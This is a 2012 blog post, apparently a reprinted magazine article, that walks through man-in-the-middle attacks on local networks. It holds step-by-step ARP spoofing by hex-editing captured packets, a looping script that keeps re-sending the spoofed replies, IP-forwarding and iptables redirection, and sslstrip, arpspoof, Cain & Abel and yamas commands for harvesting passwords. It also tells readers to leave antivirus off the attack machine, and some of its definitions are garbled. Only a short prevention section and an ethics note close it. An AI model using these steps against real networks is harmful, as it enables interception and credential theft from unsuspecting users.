Wednesday, June 20, 2012

Dangers of Man in the middle attacks to modern life


Overview
In hakin9.org May release, I have wrote more on the number of ways of performing MITM and also how to steal information from a SSL channel. Read more to the content and enjoy the journey.

Dangers of Man in the middle attacks to modern life
In modern times, we have been exposed through the use of any of the computers, smart phones or any device which are all connected in a consolidates network. When we term the word network, it means that we can communicate with the other party by sending information through the cables or even in the air.


Introduction
Man in the middle attacks allow those of evil intent to gather information without the knowledge of either communicating party. If done properly, there is little to no sign of the attack, and because of that fact, additional weaknesses are exposed (think recovered usernames and passwords).
But of course, in order to have those communications to be transmitted over the network between different equipment there must be a standard or a certain framework. The model was known as Open Systems Interconnection (OSI) model is a reference model developed by ISO (International Organization for Standardization) in 1984.
The Open Systems Interconnection (OSI) model involves a communication process which have been divided into 7 layers, which divides the tasks involved with moving information between networked computers into seven smaller, more manageable task groups.
In nut shell, the Layers 7 through 4 deal with end to end communications between data source and destinations. Layers 3 to 1 deal with communications between network devices

Explanation of 7 layer OSI in-short
Layer 1: Physical layer
Physical layer defines the cable or physical medium itself.
Layer 2 : Data link
LinkData Link layer defines the format of data on the network. A network data frame, aka packet, includes checksum, source and destination address, and data such as MAC.
Layer 3 : Network
IP is responsible for routing, directing datagrams from one network to another.
Layer 4 : Transport
Transmission Control Protocol (TCP) and User Datagram Protocol (UDP), sits at the transport layer.
Layer 5 : Session
The session protocol defines the format of the data sent over the connections and have a mechanism for opening, closing and managing a session between end-user application processes.
Layer 6 : Presentation
The canonical uses a standard byte ordering and structure packing convention, independent of the host delivery and formatting of information to the application layer for further processing or display.
Layer 7 : Application
Application running on server such as http, email and etc.

Why should we care?
At the beginning, we have talk about espionage and now we talk about 7 layer OSI, what it have to do with the risk?.  From my point of view, they will be another layer which is layer 8 which it is reflect back to the end users.  Layer 8 doesn’t exist in any OSI layer, but however in my opinion it should be part of it. Without any user interaction on some cases, how should we expect the data to be transmitted over?.
Human always become the bottleneck in the security arena, as because human does mistake and this is where the problem is. Let me give you an example, if you are working in corporate organization, I am pretty sure you are well protected in a very secure network environment. But do you think that would be chances for these users to use his or her laptop to access internet in other public network such as in airport, internet café and etc?. Although the likelihood is low, but do you think it would have chances to happen?

What is Mac address?
Short for address resolution protocol, a network layer protocol use to convert an IP address into a physical address which will have the format of MM:MM:MM:SS:SS:SS. The address is unique to each of the computer hardware. It has 12 digit of hexadecimal numbers and 48 bits in length. The first half of the address represents the adapter manufacture. As for the example 00:A0:C9:11:22:33, the first prefix which is 00:A0:C9 it indicates the manufacture is from Intel Corporation.
What have bring my interest in this area would be the security issue when you are running on a flat lan environment. I will explain detail on this article. Let get started by how Microsoft assign the pool when the Hyper-V is installed. The MAC address is divided into 2 part, the first part would be as highlight in color which I have explain earlier. You can have a look into detail as in figure 1.
00:15:5D:1A:2B:00
 
The blue portion is Microsoft OEM , but have you ever think where the red portion coming from? Let me explain to you, let said your IP address of the Hyper-V is 10.208.26.43 , the second IP number which it is 26.43 you will need to convert from dec to Hex which you will get 1A:2B. 
So each time when you deploy the Hyper-V host the MAC address won't be duplicated. So you will the range of MAC address pool will have something like as below. FF when you convert it from HEX to DEC you will get 255.
00:15:5D:1A:2B:00 to 00:15:5D:1A:2B:FF.
Figure 1 : registry location to show the mac address pool

Where the risk, I don’t get it?
This is where the challenge come in to the picture, now as the perpetrator is getting intelligent day by using the free tools available in the internet, they can launch a Man in the Middle attack which is also known as MITM.
What it really does, it impersonate someone in the network and become a middle man of transmitting information from source to the destination. By using this way, it also can become a denial of service. I will explain in more detail as we go along on the technical on how to.
Principle of ARP Spoofing
To summarize, arp spoofing can be term as man in the middle attack or a DDOS attack as it will send a not existence MAC in the network. The diagram below will give you some idea of it.
To give you more an understanding on the packet, I decide to capture the info on my lab and it consists of different step and stage.

Man In The Middle by the hard way

Stage 1: Collecting Packet information
1)The tools we use on this lab is wireshark, you can download the tools from the following Wireshark Download Page.
2)After you have perform the installation run the wireshark tools as in figure 2.
Figure 2: Running wireshark

3)Configure the interface for capturing packet as on figure 3.
Figure 3: Configure interface

4)As per on screen, you will need to check on Capture packet in promiscuous mode which mean in the sniffing mode
Figure 4: Capture packet in promiscuous mode

5)After you have completed all the setting, click the start button and you will see some packet have been capture.

6)You should be getting some packet as below, this would be our interest for our next step as in figure 5.
Figure 5: Result of info collection



Stage 2 : Analysis of the packet
1.   This is the sample of the right content of the files.
2.   Export the selected packet to /tmp/script/arp
3.   Edit the files by typing this command (hexedit –b /tmp/script/arp)
Info                          Remark
Destination                     00 50 56 F4  78 89 (GW) @192.168.18.2
Target Ip add                  C0 A8   12 02  (GW) @ 192.168.18.2                   
Source                             00 0C   29 F1 EF DB  (Hacker) @ 192.168.18.139
Sender IP                        C0 A8 12 8B   (Hacker) @ 192.168.18.139
Victim                              00 0C 29 13 80 DD  @ 192.168.18.130
Victim IP                         C0 A8   12 82  (GW) @ 192.168.18.130                   

00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Stage 3: Modify Packet
1.   Start modify the victim packet
2.   hexedit –b  arp-victim
3.   replace hacker mac address with viticm mac  address
4.   replace gateway mac address with hacker mac address
Before changing the packet
00000000  00 0C 29 F1  EF DB 00 50   56 F4 78 89  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 50   56 F4 78 89  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 F1  EF DB C0 A8   12 8B 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

After Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 13 80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

5.   Save the files as arp-victim and sent the files to the victim
6.   file2cable -v -i eth0 -f arp-victim

Summary on what have been modified
Before packet been modified
Hacker Mac
Gateway Mac
X
X
Gateway Mac
Gateway IP address
Hacker Mac
Hacker IP
x

After packet been modified
Victim Mac
Hacker Mac
x
x
Hacker Mac
Gateway Ip address
Victim Mac
Victim Ip address
x

Stage 4: Modify Gateway packet
1.   Cp arp-victim arp-gateway
2.   Hexedit –b arp-gateway

Before Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 02   .......PV.x.....
00000020  00 0C 29 13 80 DD C0 A8   12 82 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

After Changing the packet
00000000 00 50 56 F4  78 89 00 0C 29 F1  EF DB  08 06 00 01   ..)....PV.x.....
00000010  08 00 06 04  00 02 00 0C 29 F1  EF DB  C0 A8 12 82   .......PV.x.....
00000020  00 50 56 F4  78 89 C0 A8   12 02 00 00  00 00 00 00   ..).............
00000030  00 00 00 00  00 00 00 00   00 00 00 00                ............

Stage 5: Enable IP forwarding
1.   As explain earlier, if we don’t have this step been configure on stage 5. The attack it self till stage 4 will become denial of service. But of course you don’t want those to happen, because your intention is to collect information.
2.   What you need to do next is to Enable IP forwarding on the backtrack it self. In layman term , it mean enable routing function on the machines so that the packet can be transmitted.
Echo 1 > /proc/sys/net/ipv4/ip_forward
Nano doarp.sh
Chmod 700 doarp.sh
#!/bin/bash
While [ 1 ];do
File2cable –I eth0 –f arp-victim
File2cable –I eth0 –f arp-gateway
Sleep 2
Done


Summary on what have been modifed
Before packet been modified
Victim Mac
Hacker Mac
x
x
Hacker Mac
Gateway Ip address
Victim Mac
Victim IP
x
After packet been modified
Gateway Mac
Hacker Mac
x
x
Hacker Mac
Victim Ip address
Gateway  Mac
Gateway IP
x

Stage 6: Wait & monitor
These would be the last step, what you need to do is to monitor your wireshark and see for any potential any login ID with password. But if the users are using any encrypted channel, you won’t be able to see the content.

Man In The Middle new trend
After you have started looking at the hard way of the MITM, do you think you will use it?. The effort to do it, was quite a lot and mistake could happen. The chances of success might be low. The reality is, this is how people do it, long time ago.
Practically no one will do the hard way, but it is good to understand in depth how arp spoof really works. The soft way I would be mentioning here will be 2 types, one is more toward on windows environments and another will be toward on linux environment. I would pick the most common target that perpetrator will do in order to get the information they want, and from there you can explore more detail to it.

Building a MITM attacker machine on Windows
I think most of all the users are on windows, and they are more comfortable to use windows as the machines to perform an attack. To built such as machine they are certain thing that you must know. The first is , don’t ever install any antivirus in your machine. As the antivirus will remove those files. 2nd don’t ever use that machine to surf internet to avoid any potential viruses on the machine. While on the 3th comment will be which OS is the prefer option. As mostly software run pretty well on Windows Xp and this is recommended to be used. 

But you must take note as well, the OS is soon going to reach the end of life.
Since we are just focusing on the man in the middle attack, the favorite tools to be used is Cain & Able. If you read on the bible, you will notice the name is the 2 son of Adams & Eve. But today, I am not asking you to read the bible, but I am going to explain about the tools.
The tools has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. But of the time, the tools have been use for crime.
The tools can do a lot of damage which include the following:

1.   WEP cracking
2.   Speeding up packet capture speed by wireless packet injection
3.   Ability to record VoIP conversations
4.   Decoding scrambled passwords
5.   Calculating hashes
6.   Traceroute
7.   Revealing password boxes
8.   Uncovering cached passwords
9.   Dumping protected storage passwords
10.        ARP spoofing
11.        IP to MAC Address resolver
12.        Network Password Sniffer

Let’s get started
As per on the figure 6, this is how the cain and able look like, the GUI is user friendly and you can have all the information required in just of a few clicks.
Figure 6: Cain & Able

The first thing you must do is to identify your ip address by typing ipconfig /all in your command prompt.

The next steps is to click on the icon to activate Cain & Abel, click ARP, start sniffing, sniffing tab, scan the MAC addresses on the entire network.

Wait sniffing process is complete, click the ARP tab on the bottom, click the "+" sign to add it to the new window will pop up consists of two columns, "now is the time to hack" click IP server in the left column and click the IP address of the victim on the right, do it repeatedly against all targets. But in most cases, we will target all as we don’t know the machine is belong to who. Remember don’t run this on your production environment as it could do a lot of damages.

What would happen in the background is, the tools will start to run a poisoning attack on the victim IP address. If during that time, the users are surfing internet via http or any. You would be able to see it on the password tab. I am not against this tools, but however if the users is visiting some https website, the users will get a prompt whether they want to continue on the website. Chances of the users clicking on continue on the website is high, but then again, I believe we could do better. The tools also generate a certificate on behalf of the real origin website, but why the users still get a prompt?. This is because the certificate have a different thumbprint information. If in your corporate organization, if you are using some sort of proxy with certificate and if you have trusted the proxy certificate, that have shown your user ID have been capture. So take notes on this too.

Building a MITM attacker machine on linux
The approach of doing it, will be almost the same as for windows, but of course in linux you suppose to expect more text than GUI. There are 2 approach we can do here, the first approach will be semi auto and the last approach will be fully automatic.
The first approach you still need to have some manual work such as configuring the machine to route the traffic, some firewall rules and reading the logs. I will explain why this is not a good approach as we go into detail.

To enable the routing function we must change some value in the /proc as below :

echo 1 > /proc/sys/net/ipv4/ip_forward

Next step is to configure all incoming request to be diverted, you can use any destination port that you would like to use

iptables -t nat -A  PREROUTING  -p TCP -- destination-port 80 -j REDIRECT –to-port 12345

Now this is where the real work start, you will need to use the terminal and
cd to /pentest/web/sslstrip as we need to run some python script from there.

To view all the available option in the command you can type the following command.

Python ssltrip.ph --help
Options:
 -w Specify file to log on
-p log only SSL port
-S log all ssl and http traffic to and from server
-l port to listen on
-f substitute a lock favicon
-k kill session in progress
-h print help message

To start the command, you would need to run the command as below :
python sslstrip.py -l 12345

Now we need to start the MITM process, if you did see the process is getting simpler and easy. From the manual way of changing the value till we have a command that does the spoofing for us.

arpspoof -i eth0 -t Victim_IP Gateway_IP

Once the client start to surf internet, all the logs will be capture in sslstrip.log. You can view the real time changes by using the tail command as shown in below:

tail -f sslstrip.log

In reality, this will work in a smaller environment, as if there is too much user is visiting the website, you might want to use other command such as grep or print  command to capture the info that you would like to see.

What would be the next evolution for it?
As you have read on the different steps, either on the manual way, on windows machines or even on linux. Do you notice that the tools is getting intelligent as the time comes. The steps that I would like to show above is fully automated and thanks to the developer who create this tools. Then again, from the security stand point, you can’t differentiate what is real and fake anymore cybercrime would be expected to be increases.
The tools is known as yamas which is available as download from comax.fr/yamas.php . Yamas is a tool that aims at facilitating man in the middle attacks by automating the whole process from setting up ip forwarding and modifying iptables, to the ARP cache poisoning (either using ettercap or arpspoof). The traffic is stripped off ssl with the famous sslstrip 0.9.
What you need to do it is just run the command yamas and wait for the result. When you first run the command, it will ask where should the traffic should be diverted to which shown as below. Select the default and press enter.
what port should the traffic be redirect to? (Default = 8080)
The second screen you will see is to enter the gateway IP, by default it will automatic detect the range for you. Press enter to proceed.

Enter Ip gateway address or press enter to use x.x.x.x

After that you will be prompt to select the interface. Press enter to use the default value.

what interface would you like to use . It should match IP gateway as shown above

As by default, we will target the entire network, so will just press enter.
We will target the whole network as default, press 0 for manual

What next here is just wait and all the credential will be populated on your screen.

Prevention
As you have read all the steps, it might be look difficult to protect from layer 2 attack. But some of the vendor product does provide  protection against the attack such as CISCO which sometime they name it as dynamic ARP. You must be aware that not all location can afford to have a prevention devices in place such as public network. This is why security awareness should be in place to guide the user what they are allow to do when they are on the public network. There are no such thing as patches for human, they need to be educated.

Note on ethics
Our intention, when we started writing these articles was to give an overview what tools exists on the market and how we can use it to secure our organization against any unidentified threats. When you start to use the tools above, please do make sure you have this with you:
1.   Don’t use this for any malicious intention
2.   Don’t attack any organization without any approval from the top management.
3.   Think of the damage that you might cause

Conclusion
In this article, we have presented on how to perform a man in the middle attack on linux as well as on windows machine. We have shown the trick of hiding in the network while we are performing intelligent information gathering. The author also shows you a common attack that commonly done by the attacker and to show how fast they could obtain information in the stealth way. As you can see, the growing of the tools can help anyone to be a security pen tester, while if it is been used in a wrong hands it could bring more damage than good. Such attack is much easier to perform and more likely to succeed. The author sincerely hopes that these short articles can increase the awareness to anyone who is handling computer or security services. In the broader sense however, we hope that the information could help you to increase the security your organization assets in better manner.

Summary 
Stay tune with my next articles. Let us know what you though , learns and hope for next articles!. Connect with us on GOOGLE+ , TWITTER and FACEBOOK.

No comments:

Post a Comment